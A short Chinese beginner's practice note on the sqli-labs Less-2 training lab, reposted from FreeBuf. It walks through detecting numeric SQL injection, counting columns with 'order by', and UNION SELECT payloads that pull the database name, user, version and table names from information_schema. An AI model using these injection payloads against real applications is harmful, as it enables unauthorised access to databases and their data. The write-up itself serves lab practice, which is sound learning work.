sqli-labs练习（Less-2） – 作者:犹豫就会败北-安全小百科

sqli-labs练习（Less-2） – 作者:犹豫就会败北

菜鸟练习笔记，大牛请绕道~~~

1）判断注入

查询?id=1，返回正常

加单引号’，返回错误

查询 and 1=1

返回正常

查询 and 1=2

返回错误

可猜测存在SQL注入

2）判断字段

order by 3 ：正常

order by 4 ：报错

可猜测长度为3

3）猜测报错的地方

and 1=2 union select 1,,3 from information_schema.tables

在2的报错基础上报基本信息

database():数据库名

version():数据库版本

user():数据库用户

@@version_compile_os:操作系统

union select 1,user(),3

在猜测出数据库名后，猜测表名

union select 1,group_concat(table_name),3 from information_schema.tables
where table_schema=十六进制的数据库名

来源：freebuf.com 2021-01-30 02:09:14 by: 犹豫就会败北

文章版权归作者所有，未经允许请勿转载。

THE END

安全网站文章

喜欢就支持一下吧

sqli-labs练习（Less-2） – 作者:犹豫就会败北

请登录后发表评论

日常避险攻略

紧张局势重大升级！“第三次世界大战威胁迫近”

ChatGPT问答: RiscV 汇编怎么写 1到100 数字之和代码 RISC-V 汇编语言入门 add, sub, lw, sw, j 常用指令

RARS 汇编模拟器支持的RISC-V指令

使用FFMPEG快速替换视频中的音频

2023.03.26 我去年买了个表，一直走不准，现在终于可以设置时间了

公司成功上市啦！ – 作者:KOAL格尔国信

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

女祭女戚

帆软10.0 Getshell漏洞分析

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

Woppoware PostMaster多个输入验证和信息泄露漏洞

行业新闻汇编（6月9日） – 作者:TcaplusDB

ascdc Afterstep缓冲区溢出漏洞

VulnHub-Chill-Hack 1 靶场渗透测试

Working Resources BadBlue Search Page Cross Site Scripting Vulnerability

浅谈XML实体注入漏洞 – 作者:Hu3sky

付费下载测试

zibll子比主题 v5.6最新免授权版

创建不做身份鉴定的HTTPClient发送HTTPS的POST请求的工具类，解决异常：sun.security.validator.ValidatorException: PKIX path vali

Python网络开发简单的IP城市定位WebAPI

Attack tive Directory – 作者:sec875

免费领爱企查两年会员